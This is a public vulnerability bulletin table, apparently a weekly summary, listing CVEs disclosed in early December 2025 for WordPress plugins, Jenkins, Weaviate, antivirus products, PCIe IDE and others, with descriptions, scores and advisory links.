| Shahjahan Jewel--Fluent Booking | Missing Authorization vulnerability in Shahjahan Jewel Fluent Booking fluent-booking allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fluent Booking: from n/a through <= 1.9.11. | 2025-12-09 | not yet calculated | CVE-2025-67597 | https://vdp.patchstack.com/database/Wordpress/Plugin/fluent-booking/vulnerability/wordpress-fluent-booking-plugin-1-9-11-broken-access-control-vulnerability?_s_id=cve |
| PSM Plugins--SupportCandy | Cross-Site Request Forgery (CSRF) vulnerability in PSM Plugins SupportCandy supportcandy allows Cross Site Request Forgery. This issue affects SupportCandy: from n/a through <= 3.4.1. | 2025-12-09 | not yet calculated | CVE-2025-67598 | https://vdp.patchstack.com/database/Wordpress/Plugin/supportcandy/vulnerability/wordpress-supportcandy-plugin-3-4-1-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| WebToffee--WebToffee eCommerce Marketing Automation | Missing Authorization vulnerability in WebToffee WebToffee eCommerce Marketing Automation decorator-woocommerce-email-customizer allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects WebToffee eCommerce Marketing Automation: from n/a through <= 2.1.1. | 2025-12-09 | not yet calculated | CVE-2025-67599 | https://vdp.patchstack.com/database/Wordpress/Plugin/decorator-woocommerce-email-customizer/vulnerability/wordpress-webtoffee-ecommerce-marketing-automation-plugin-2-1-1-broken-access-control-vulnerability?_s_id=cve |
| Jenkins Project--Jenkins | Jenkins 2.540 and earlier, LTS 2.528.2 and earlier does not properly close HTTP-based CLI connections when the connection stream becomes corrupted, allowing unauthenticated attackers to cause a denial of service. | 2025-12-10 | not yet calculated | CVE-2025-67635 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins | A missing permission check in Jenkins 2.540 and earlier, LTS 2.528.2 and earlier allows attackers with View/Read permission to view encrypted password values in views. | 2025-12-10 | not yet calculated | CVE-2025-67636 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins | Jenkins 2.540 and earlier, LTS 2.528.2 and earlier stores build authorization tokens unencrypted in job config.xml files on the Jenkins controller where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system. | 2025-12-10 | not yet calculated | CVE-2025-67637 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins | Jenkins 2.540 and earlier, LTS 2.528.2 and earlier does not mask build authorization tokens displayed on the job configuration form, increasing the potential for attackers to observe and capture them. | 2025-12-10 | not yet calculated | CVE-2025-67638 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins | A cross-site request forgery (CSRF) vulnerability in Jenkins 2.540 and earlier, LTS 2.528.2 and earlier allows attackers to trick users into logging in to the attacker's account. | 2025-12-10 | not yet calculated | CVE-2025-67639 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins Git client Plugin | Jenkins Git client Plugin 6.4.0 and earlier does not correctly escape the path to the workspace directory as part of an argument in a temporary shell script generated by the plugin, allowing attackers able to control the workspace directory name to inject arbitrary OS commands. | 2025-12-10 | not yet calculated | CVE-2025-67640 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins Coverage Plugin | Jenkins Coverage Plugin 2.3054.ve1ff7b_a_a_123b_ and earlier does not validate the configured coverage results ID when creating coverage results, only when submitting the job configuration through the UI, allowing attackers with Item/Configure permission to use a `javascript:` scheme URL as identifier by configuring the job through the REST API, resulting in a stored cross-site scripting (XSS) vulnerability. | 2025-12-10 | not yet calculated | CVE-2025-67641 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins HashiCorp Vault Plugin | Jenkins HashiCorp Vault Plugin 371.v884a_4dd60fb_6 and earlier does not set the appropriate context for Vault credentials lookup, allowing attackers with Item/Configure permission to access and potentially capture Vault credentials they are not entitled to. | 2025-12-10 | not yet calculated | CVE-2025-67642 | Jenkins Security Advisory 2025-12-10 |
| Jenkins Project--Jenkins Redpen - Pipeline Reporter for Jira Plugin | Jenkins Redpen - Pipeline Reporter for Jira Plugin 1.054.v7b_9517b_6b_202 and earlier does not correctly perform path validation of the workspace directory while uploading artifacts to Jira, allowing attackers with Item/Configure permission to retrieve files present on the Jenkins controller workspace directory. | 2025-12-10 | not yet calculated | CVE-2025-67643 | Jenkins Security Advisory 2025-12-10 |
| miniflux--v2 | Miniflux 2 is an open source feed reader. Versions 2.2.14 and below treat redirect_url as safe when url.Parse(...).IsAbs() is false, enabling phishing flows after login. Protocol-relative URLs like //ikotaslabs.com have an empty scheme and pass that check, allowing post-login redirects to attacker-controlled sites. This issue is fixed in version 2.2.15. | 2025-12-11 | not yet calculated | CVE-2025-67713 | https://github.com/miniflux/v2/security/advisories/GHSA-wqv2-4wpg-8hc9 https://github.com/miniflux/v2/commit/76df99f3a3db234cf6b312be5e771485213d03c7 |
| zitadel--zitadel | ZITADEL is an open-source identity infrastructure tool. Versions 2.44.0 through 3.4.4 and 4.0.0-rc.1 through 4.7.1 disclose the total number of instance users to authenticated users, regardless of their specific permissions. While this does not leak individual user data or PII, disclosing the total user count via the totalResult field constitutes an information disclosure vulnerability that may be sensitive in certain contexts. This issue is fixed in versions 3.4.5 and 4.7.2. | 2025-12-11 | not yet calculated | CVE-2025-67717 | https://github.com/zitadel/zitadel/security/advisories/GHSA-f4cf-9rvr-2rcx https://github.com/zitadel/zitadel/commit/826039c6208fe71df57b3a94c982b5ac5b0af12c |
| formio--formio | Form.io is a combined Form and API platform for Serverless applications. Versions 3.5.6 and below and 4.0.0-rc.1 through 4.4.2 contain a flaw in path handling which could allow an attacker to access protected API endpoints by sending a crafted request path. An unauthenticated or unauthorized request could retrieve data from endpoints that should be protected. This issue is fixed in versions 3.5.7 and 4.4.3. | 2025-12-11 | not yet calculated | CVE-2025-67718 | https://github.com/formio/formio/security/advisories/GHSA-m654-769v-qjv7 https://github.com/formio/formio/commit/1836bdd9f55f5888ff397c257b2108c09d3de478 |
| ibexa--user | Ibexa is a composable end-to-end DXP (Digital Experience Platform). Versions 5.0.0-beta1 through 5.0.3 do not have password validation. During the transition from v4 to v5 an error was introduced into validation code which causes the validation of the previous password not to run as expected. This makes it possible for a logged in user to change their password in the back office without knowing the previous password. For example, if a user logs into their account and walks away without locking their workstation, an attacker could access the unattended session and change the password, therefore locking the legitimate user out. This issue is fixed in version 5.0.4. | 2025-12-11 | not yet calculated | CVE-2025-67719 | https://github.com/ibexa/user/security/advisories/GHSA-x93p-w2ch-fg67 https://github.com/ibexa/user/commit/9d485bf385e6401c9f7ee80287d8ccd00f73dcf4 https://developers.ibexa.co/security-advisories/ibexa-sa-2025-005-password-change-and-xss-vulnerabilities-in-back-office |
| airlift--aircompressor | Aircompressor is a library with ports of the Snappy, LZO, LZ4, and Zstandard compression algorithms to Java. In versions 3.3 and below, incorrect handling of malformed data in Java-based decompressor implementations for Snappy and LZ4 allow remote attackers to read previous buffer contents via crafted compressed input. With certain crafted compressed inputs, elements from the output buffer can end up in the uncompressed output, potentially leaking sensitive data. This is relevant for applications that reuse the same output buffer to uncompress multiple inputs. This can be the case of a web server that allocates a fix-sized buffer for performance purposes. There is similar vulnerability in GHSA-cmp6-m4wj-q63q. This issue is fixed in version 3.4. | 2025-12-12 | not yet calculated | CVE-2025-67721 | https://github.com/airlift/aircompressor/security/advisories/GHSA-vx9q-rhv9-3jvg https://github.com/airlift/aircompressor/commit/f2b489b398779b40c1ee29ddb11d7edef54ddc15 https://github.com/airlift/aircompressor/commit/ff12c4d5757c9d6d1de3d39a10402f1f84f9b765 |
| parse-community--parse-server | Parse Server is an open source backend that can be deployed to any infrastructure that runs Node.js. In versions prior to 8.6.0-alpha.2, a GitHub CI workflow is triggered in a way that grants the GitHub Actions workflow elevated permissions, giving it access to GitHub secrets and write permissions which are defined in the workflow. Code from a fork or lifecycle scripts is potentially included. Only the repository's CI/CD infrastructure is affected, including any public GitHub forks with GitHub Actions enabled. This issue is fixed version 8.6.0-alpha.2 and commits 6b9f896 and e3d27fe. | 2025-12-12 | not yet calculated | CVE-2025-67727 | https://github.com/parse-community/parse-server/security/advisories/GHSA-6w8g-mgvv-3fcj https://github.com/parse-community/parse-server/commit/6b9f8963cc3debf59cd9c5dfc5422aff9404ce9d https://github.com/parse-community/parse-server/commit/e3d27fea08c8d8bdd9770a689bc2d757cda48b66 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allow authenticated users to add malicious HTML and JavaScript through description fields in the Job, Course and Batch forms. This issue is fixed in version 2.42.0. | 2025-12-12 | not yet calculated | CVE-2025-67730 | https://github.com/frappe/lms/security/advisories/GHSA-jjc4-j3hw-33h2 https://github.com/frappe/lms/commit/0877e32e1bfe64831b875707241de1c449cda45c |
| Aarondoran--servify-express | Servify Express is a Node.js package to start an Express server and log the port it's running on. Prior to 1.2, the Express server used express.json() without a size limit, which could allow attackers to send extremely large request bodies. This can cause excessive memory usage, degraded performance, or process crashes, resulting in a Denial of Service (DoS). Any application using the JSON parser without limits and exposed to untrusted clients is affected. The issue is not a flaw in Express itself, but in configuration. This issue is fixed in version 1.2. To work around, consider adding a limit option to the JSON parser, rate limiting at the application or reverse-proxy level, rejecting unusually large requests before parsing, or using a reverse proxy (such as NGINX) to enforce maximum request body sizes. | 2025-12-12 | not yet calculated | CVE-2025-67731 | https://github.com/Aarondoran/servify-express/security/advisories/GHSA-qgc4-8p88-4w7m https://github.com/Aarondoran/servify-express/commit/8dff7f56504b356278d849734ef2050e5cd23b61 https://github.com/Aarondoran/servify-express/releases/tag/V1.2 |
| frappe--lms | Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allowed authenticated attackers to enter JavaScript through the Company Website field of the Job Form, exposing users to an XSS attack. The script could then be executed in the browsers of users who opened the malicious job posting. This issue is fixed in version 2.42.0. | 2025-12-12 | not yet calculated | CVE-2025-67734 | https://github.com/frappe/lms/security/advisories/GHSA-c495-qg4v-5vr7 https://github.com/frappe/lms/commit/ca849da81558066d7614b9b6234004ff59c90632 |
| PCSX2--pcsx2 | PCSX2 is a free and open-source PlayStation 2 (PS2) emulator. In versions 2.5.377 and below, an unchecked offset and size used in a memcpy operation inside PCSX2's CDVD SCMD 0x91 and SCMD 0x8F handlers allow a specially crafted disc image or ELF to cause an out-of-bounds read from emulator memory. Because the offset and size is controlled through MG header fields, a specially crafted ELF can read data beyond the bounds of mg_buffer and have it reflected back into emulated memory. This issue is fixed in version 2.5.378. | 2025-12-12 | not yet calculated | CVE-2025-67749 | https://github.com/PCSX2/pcsx2/security/advisories/GHSA-69wg-97fx-8j5w https://github.com/PCSX2/pcsx2/commit/0b73eabd9ac19a5e290e7bee48d15be24e7b7d1b https://github.com/PCSX2/pcsx2/releases/tag/v2.5.378 |
| n/a--Weaviate OSS before 1.33.4. | An issue was discovered in Weaviate OSS before 1.33.4. An attacker with access to insert data into the database can craft an entry name with an absolute path (e.g., /etc/...) or use parent directory traversal (../../..) to escape the restore root when a backup is restored, potentially creating or overwriting files in arbitrary locations within the application's privilege scope. | 2025-12-12 | not yet calculated | CVE-2025-67818 | https://github.com/weaviate/weaviate https://weaviate.io/blog/weaviate-security-release-november-2025 |
| n/a--Weaviate OSS before 1.33.4. | An issue was discovered in Weaviate OSS before 1.33.4. Due to a lack of validation of the fileName field in the transfer logic, an attacker who can call the GetFile method while a shard is in the "Pause file activity" state and the FileReplicationService is reachable can read arbitrary files accessible to the service process. | 2025-12-12 | not yet calculated | CVE-2025-67819 | https://github.com/weaviate/weaviate https://weaviate.io/blog/weaviate-security-release-november-2025 |
| Bitdefender--Total Security | A local privilege escalation vulnerability in Bitdefender Total Security 27.0.46.231 allows low-privileged attackers to elevate privileges. The issue arises from bdservicehost.exe deleting files from a user-writable directory (C:\ProgramData\Atc\Feedback) without proper symbolic link validation, enabling arbitrary file deletion. This issue is chained with a file copy operation during network events and a filter driver bypass via DLL injection to achieve arbitrary file copy and code execution as elevated user. | 2025-12-10 | not yet calculated | CVE-2025-7073 | https://www.bitdefender.com/support/security-advisories/local-privilege-escalation-via-arbitrary-file-operation-in-bitdefender-atc-va-12590 |
| Gogs--Gogs | Improper Symbolic link handling in the PutContents API in Gogs allows Local Execution of Code. | 2025-12-10 | not yet calculated | CVE-2025-8110 | http://wiz.io/blog/wiz-research-gogs-cve-2025-8110-rce-exploit |
| TECNO--com.transsion.audiosmartconnect | Unprotected service in the AudioLink component allows a local attacker to overwrite system files via unauthorized service invocation. | 2025-12-10 | not yet calculated | CVE-2025-9056 | https://security.tecno.com/SRC/securityUpdates |
| Unknown--WPS Visitor Counter Plugin | The WPS Visitor Counter Plugin WordPress plugin through 1.4.8 does not escape the $_SERVER['REQUEST_URI'] parameter before outputting it back in an attribute, which could lead to Reflected Cross-Site Scripting in old web browsers. | 2025-12-13 | not yet calculated | CVE-2025-9116 | https://wpscan.com/vulnerability/fe2eb926-96e8-419e-bf41-5531546e6590/ |
| Moxa--MXsecurity Series | An unauthenticated device registration vulnerability, caused by Improperly Controlled Modification of Dynamically-Determined Object Attributes, has been identified in the MXsecurity Series. An unauthenticated remote attacker can exploit this vulnerability by sending a specially crafted JSON payload to the device's registration endpoint /api/v1/devices/register, allowing the attacker to register unauthorized devices without authentication. Although exploiting this vulnerability has limited modification of data, there is no impact to the confidentiality and availability of the affected device, as well as no loss of confidentiality, integrity, and availability within any subsequent systems. | 2025-12-10 | not yet calculated | CVE-2025-9315 | https://www.moxa.com/en/support/product-support/security-advisory/mpsa-252631-cve-2025-9315-unauthenticated-device-registration-vulnerability-in-mxsecurity-series |
| Rockwell Automation--432ES-IG3 Series A | A security issue exists within 432ES-IG3 Series A, which affects GuardLink® EtherNet/IP Interface, resulting in denial-of-service. A manual power cycle is required to recover the device. | 2025-12-09 | not yet calculated | CVE-2025-9368 | https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1764.html |
| Google Cloud--Cloud Data Fusion | A remote code execution (RCE) vulnerability exists in Google Cloud Data Fusion. A user with permissions to upload artifacts to a Data Fusion instance can execute arbitrary code within the core AppFabric component. This could allow the attacker to gain control over the Data Fusion instance, potentially leading to unauthorized access to sensitive data, modification of data pipelines, and exploration of the underlying infrastructure. The following CDAP versions include the necessary update to protect against this vulnerability: * 6.10.6+ * 6.11.1+ Users must immediately upgrade to them, or greater ones, available at: https://github.com/cdapio/cdap-build/releases . | 2025-12-10 | not yet calculated | CVE-2025-9571 | https://docs.cloud.google.com/support/bulletins#gcp-2025-076 |
| PCI-SIG--PCI Express Integrity and Data Encryption (PCIe IDE) Specification | An issue was discovered in the PCI Express (PCIe) Integrity and Data Encryption (IDE) specification, where insufficient guidance on Transaction Layer Packet (TLP) ordering and tag uniqueness may allow encrypted packets to be replayed or reordered without detection. This can enable local or physical attackers on the PCIe bus to violate data integrity protections. | 2025-12-09 | not yet calculated | CVE-2025-9612 | https://pcisig.com/specifications https://pcisig.com/PCIeIDEStandardVulnerabilities |
| PCI-SIG--PCI Express Integrity and Data Encryption (PCIe IDE) Specification | A vulnerability was discovered in the PCI Express (PCIe) Integrity and Data Encryption (IDE) specification, where insufficient guidance on tag reuse after completion timeouts may allow multiple outstanding Non-Posted Requests to share the same tag. This tag aliasing condition can result in completions being delivered to the wrong security context, potentially compromising data integrity and confidentiality. | 2025-12-09 | not yet calculated | CVE-2025-9613 | https://pcisig.com/specifications https://pcisig.com/PCIeIDEStandardVulnerabilities |
| PCI-SIG--PCI Express Integrity and Data Encryption (PCIe IDE) Specification | An issue was discovered in the PCI Express (PCIe) Integrity and Data Encryption (IDE) specification, where insufficient guidance on re-keying and stream flushing during device rebinding may allow stale write transactions from a previous security context to be processed in a new one. This can lead to unintended data access across trusted domains, compromising confidentiality and integrity. | 2025-12-09 | not yet calculated | CVE-2025-9614 | https://pcisig.com/specifications https://pcisig.com/PCIeIDEStandardVulnerabilities |
| Portabilis--i-Educar | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Portabilis i-Educar allows Stored Cross-Site Scripting (XSS) via the matricula_interna parameter in the educar_usuario_cad.php endpoint. This issue affects i-Educar: 2.10.0. | 2025-12-09 | not yet calculated | CVE-2025-9638 | https://fluidattacks.com/advisories/travis https://github.com/portabilis/i-educar |
Vulnerability Summary for the Week of December 1, 2025
Posted on Monday December 08, 2025
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| 10web--10Web Booster Website speed optimization, Cache & Page Speed optimizer | The 10Web Booster - Website speed optimization, Cache & Page Speed optimizer plugin for WordPress is vulnerable to arbitrary folder deletion due to insufficient file path validation in the get_cache_dir_for_page_from_url() function in all versions up to, and including, 2.32.7. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary folders on the server, which can easily lead to a loss of data or a denial of service condition. | 2025-12-06 | 9.6 | CVE-2025-13377 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f8bcf51a-36ee-4d4d-b9d6-d9db0dafd791?source=cve https://plugins.trac.wordpress.org/changeset/3402434/tenweb-speed-optimizer |
| Advantech--iView | Advantech iView versions 5.7.05.7057 and prior do not properly sanitize SNMP v1 trap (Port 162) requests, which could allow an attacker to inject SQL commands. | 2025-12-04 | 7.5 | CVE-2025-13373 | https://www.advantech.com/zh-tw/support/details/firmware?id=1-HIPU-183 https://www.cisa.gov/news-events/ics-advisories/icsa-25-338-07 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-338-07.json |
| aimeos--ai-cms-grapesjs | The Aimeos GrapesJS CMS extension provides page editor for creating content pages based on extensible components. Prior to 2021.10.8, 2022.10.8, 2023.10.8, 2024.10.8, and 2025.10.8, Javascript code can be injected by malicious editors for a stored XSS attack if the standard Content Security Policy is disabled. This vulnerability is fixed in 2021.10.8, 2022.10.8, 2023.10.8, 2024.10.8, and 2025.10.8. | 2025-12-02 | 7.7 | CVE-2025-66468 | https://github.com/aimeos/ai-cms-grapesjs/security/advisories/GHSA-424m-fj2q-g7vg https://github.com/aimeos/ai-cms-grapesjs/commit/2214f71ac27cdea25f11c8adf6bb5816db47a042 |
| ajitdas--Flex QR Code Generator | The Flex QR Code Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_qr_code() function in all versions up to, and including, 1.2.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-06 | 9.8 | CVE-2025-12673 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3d71404e-0db8-485b-a626-5e0df2076c05?source=cve https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/trunk/qr-code-generator.php#L457 https://ryankozak.com/posts/cve-2025-12673/ https://github.com/d0n601/CVE-2025-12673 |
| Akamai--Guardicore Platform Agent | The GC-AGENTS-SERVICE running as part of Akamai's Guardicore Platform Agent for Windows versions prior to v49.20.1, v50.15.0, v51.12.0, v52.2.0 is affected by a local privilege escalation vulnerability. The service will attempt to read an OpenSSL configuration file from a non-existent location that standard Windows users have default write access to. This allows an unprivileged local user to create a crafted "openssl.cnf" file in that location and, by specifying the path to a custom DLL file in a custom OpenSSL engine definition, execute arbitrary commands with the privileges of the Guardicore Agent process. Since Guardicore Agent runs with SYSTEM privileges, this permits an unprivileged user to fully elevate privileges to SYSTEM level in this manner. | 2025-12-03 | 7.8 | CVE-2025-53841 | https://www.tuv.com/landingpage/en/vulnerability-disclosure/ https://techdocs.akamai.com/guardicore-platform-agent/changelog https://community.akamai.com/customers/s/article/Windows-Agent-Vulnerability-Summary-and-Resolution |
| Argus Technology Inc.--BILGER | Insertion of Sensitive Information Into Sent Data vulnerability in Argus Technology Inc. BILGER allows Choosing Message Identifier.This issue affects BILGER: before 2.4.9. | 2025-12-02 | 7.5 | CVE-2025-13295 | https://www.usom.gov.tr/bildirim/tr-25-0423 |
| Array Networks--ArrayOS AG | Array Networks ArrayOS AG before 9.4.5.9 allows command injection, as exploited in the wild in August through December 2025. | 2025-12-05 | 7.2 | CVE-2025-66644 | https://www.jpcert.or.jp/at/2025/at250024.html https://x.com/ArraySupport/status/1921373397533032590 https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-arrayos-ag-vpn-flaw-to-plant-webshells/ |
| auth0--node-jws | auth0/node-jws is a JSON Web Signature implementation for Node.js. In versions 3.2.2 and earlier and version 4.0.0, auth0/node-jws has an improper signature verification vulnerability when using the HS256 algorithm under specific conditions. Applications are affected when they use the jws.createVerify() function for HMAC algorithms and use user-provided data from the JSON Web Signature protected header or payload in HMAC secret lookup routines, which can allow attackers to bypass signature verification. This issue has been patched in versions 3.2.3 and 4.0.1. | 2025-12-04 | 7.5 | CVE-2025-65945 | https://github.com/auth0/node-jws/security/advisories/GHSA-869p-cjfg-cm3x https://github.com/auth0/node-jws/commit/34c45b2c04434f925b638de6a061de9339c0ea2e |
| Avast--Antivirus | Integer Overflow or Wraparound vulnerability in Avast Antivirus (25.1.981.6) on Windows allows Privilege Escalation.This issue affects Antivirus: from 25.1.981.6 before 25.3. | 2025-12-01 | 9 | CVE-2025-3500 | https://www.gendigital.com/us/en/contact-us/security-advisories/ |
| Avast--Antivirus | Heap-based Buffer Overflow, Out-of-bounds Read vulnerability in Avast Antivirus on MacOS when scanning a malformed file may allow Local Execution of Code or Denial-of-Service of the anitvirus engine process.This issue affects Antivirus: from 8.3.70.94 before 8.3.70.98. | 2025-12-01 | 9 | CVE-2025-8351 | https://www.gendigital.com/us/en/contact-us/security-advisories/ |
| Avast--Antivirus | Heap-based Buffer Overflow, Out-of-bounds Write vulnerability in Avast Antivirus on MacOS of a crafted Mach-O file may allow Local Execution of Code or Denial of Service of antivirus protection. This issue affects Antivirus: from 15.7 before 3.9.2025. | 2025-12-01 | 8.1 | CVE-2025-10101 | https://www.gendigital.com/us/en/contact-us/security-advisories/ |
| Avast--Antivirus | NULL Pointer Dereference vulnerability in Avast Antivirus on MacOS, Avast Anitvirus on Linux when scanning a malformed Windows PE file causes the antivirus process to crash.This issue affects Antivirus: 16.0.0; Anitvirus: 3.0.3. | 2025-12-01 | 7.5 | CVE-2025-7007 | https://www.gendigital.com/us/en/contact-us/security-advisories/ |
| bacnet-stack--bacnet-stack | BACnet Protocol Stack library provides a BACnet application layer, network layer and media access (MAC) layer communications services. Prior to 1.5.0.rc2, The npdu_is_expected_reply function in src/bacnet/npdu.c indexes request_pdu[offset+2/3/5] and reply_pdu[offset+1/2/4] without verifying that those APDU bytes exist. bacnet_npdu_decode() can return offset == 2 for a 2-byte NPDU, so tiny PDUs pass the version check and then get read out of bounds. On ASan/MPU/strict builds this is an immediate crash (DoS). On unprotected builds it is undefined behavior and can mis-route replies; RCE is unlikely because only reads occur, but DoS is reliable. | 2025-12-05 | 7.5 | CVE-2025-66624 | https://github.com/bacnet-stack/bacnet-stack/security/advisories/GHSA-8wgw-5h6x-qgqg https://github.com/bacnet-stack/bacnet-stack/commit/9378f7d1e70169ebde4a5090bae7603703eadf48 |
| brainstormforce--Starter Templates AI-Powered Templates for Elementor & Gutenberg | The Starter Templates plugin for WordPress is vulnerable to arbitrary file upload in all versions up to, and including, 4.4.41. This is due to insufficient file type validation detecting WXR files, allowing double extension files to bypass sanitization while being accepted as a valid WXR file. This makes it possible for authenticated attackers, with author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-06 | 8.8 | CVE-2025-13065 | https://www.wordfence.com/threat-intel/vulnerabilities/id/439e4c99-8f34-4e66-9d86-c0cbb8cf6da0?source=cve https://plugins.trac.wordpress.org/changeset/3395498/astra-sites/tags/4.4.42/inc/lib/starter-templates-importer/importer/wxr-importer/st-wxr-importer.php |
| brainstormforce--SureMail SMTP and Email Logs Plugin with Amazon SES, Postmark, and Other Providers | The SureMail - SMTP and Email Logs Plugin for WordPress is vulnerable to Unrestricted Upload of File with Dangerous Type in versions up to and including 1.9.0. This is due to the plugin's save_file() function in inc/emails/handler/uploads.php which duplicates all email attachments to a web-accessible directory (wp-content/uploads/suremails/attachments/) without validating file extensions or content types. Files are saved with predictable names derived from MD5 hashes of their content. While the plugin attempts to protect this directory with an Apache .htaccess file to disable PHP execution, this protection is ineffective on nginx, IIS, and Lighttpd servers, or on misconfigured Apache installations. This makes it possible for unauthenticated attackers to achieve Remote Code Execution by uploading malicious PHP files through any public form that emails attachments, calculating the predictable filename, and directly accessing the file to execute arbitrary code granted they are exploiting a site running on an affected web server configuration. | 2025-12-02 | 8.1 | CVE-2025-13516 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3a20047-a325-4d29-a848-7ffa525d0bad?source=cve https://plugins.trac.wordpress.org/browser/suremails/trunk/inc/emails/handler/uploads.php#L231 https://plugins.trac.wordpress.org/browser/suremails/trunk/inc/emails/handler/uploads.php#L113 https://plugins.trac.wordpress.org/browser/suremails/trunk/inc/admin/plugin.php#L407 https://cwe.mitre.org/data/definitions/434.html https://plugins.trac.wordpress.org/changeset/3403145/suremails/trunk?contextall=1&old=3389326&old_path=%2Fsuremails%2Ftrunk |
| Chanjet--CRM | A vulnerability was detected in Chanjet CRM up to 20251121. Affected is an unknown function of the file /tools/jxf_dump_table_demo.php. The manipulation of the argument gblOrgID results in sql injection. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.3 | CVE-2025-14189 | VDB-334609 | Chanjet CRM jxf_dump_table_demo.php sql injection VDB-334609 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699133 | chanjet CRM V1.0 SQL Injection https://github.com/hacker-routing/cve/issues/2 https://github.com/hacker-routing/cve/issues/2#issue-3646348225 |
| Chanjet--TPlus | A flaw has been found in Chanjet TPlus up to 20251121. Affected by this vulnerability is an unknown functionality of the file /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanySettingController,Ufida.T.SM.UIP.ashx?method=Load. This manipulation of the argument currentAccId causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 7.3 | CVE-2025-14190 | VDB-334610 | Chanjet TPlus sql injection VDB-334610 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699144 | Chanjet Chanjet T+ V1.0 SQL Injection https://github.com/hacker-routing/Changjetong-T-/issues/1 https://github.com/hacker-routing/Changjetong-T-/issues/1#issue-3646765351 |
| coder--coder | Coder allows organizations to provision remote development environments via Terraform. Prior to 2.26.5, 2.27.7, and 2.28.4, Workspace Agent manifests containing sensitive values were logged in plaintext unsanitized. An attacker with limited local access to the Coder Workspace (VM, K8s Pod etc.) or a third-party system (SIEM, logging stack) could access those logs. This vulnerability is fixed in 2.26.5, 2.27.7, and 2.28.4. | 2025-12-03 | 7.8 | CVE-2025-66411 | https://github.com/coder/coder/security/advisories/GHSA-jf75-p25m-pw74 https://github.com/coder/coder/commit/e2a46393fce40bc630df3293c1ee66a596277289 https://github.com/coder/coder/releases/tag/v2.26.5 https://github.com/coder/coder/releases/tag/v2.27.7 https://github.com/coder/coder/releases/tag/v2.28.4 |
| CODESYS--CODESYS Control RTE (SL) | An unauthenticated remote attacker may cause the visualisation server of the CODESYS Control runtime system to access a resource with a pointer of wrong type, potentially leading to a denial-of-service (DoS) condition. | 2025-12-01 | 7.5 | CVE-2025-41738 | https://certvde.com/de/advisories/VDE-2025-100 |
| CODESYS--CODESYS Development System | An unauthenticated attacker can trick a local user into executing arbitrary code by opening a deliberately manipulated CODESYS project file with a CODESYS development system. This arbitrary code is executed in the user context. | 2025-12-01 | 7.8 | CVE-2025-41700 | https://certvde.com/de/advisories/VDE-2025-101 |
| codisto--Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration Powered by Codisto | The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration - Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync() function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-04 | 7.2 | CVE-2025-11727 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f4e3b796-af9a-4403-8d9a-1b56d7253b45?source=cve https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L2101 https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3063 https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3248 https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L2117 https://plugins.trac.wordpress.org/browser/codistoconnect/trunk/connect.php#L3249 |
| contentstudio--ContentStudio | The ContentStudio plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the cstu_update_post() function in all versions up to, and including, 1.3.7. This makes it possible for authenticated attackers, with Author-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2025-12-05 | 8.8 | CVE-2025-12181 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5b92b0a4-7ebf-43b3-837b-ad710e5e35ff?source=cve https://wordpress.org/plugins/contentstudio/ |
| Dell--CloudBoost Virtual Appliance | Dell CloudBoost Virtual Appliance, versions 19.13.0.0 and prior, contains an Improper Restriction of Excessive Authentication Attempts vulnerability. An unauthenticated attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access. | 2025-12-05 | 7 | CVE-2025-46603 | https://www.dell.com/support/kbdoc/en-us/000397417/dsa-2025-387-security-update-for-dell-cloudboost-virtual-appliance-multiple-vulnerabilities |
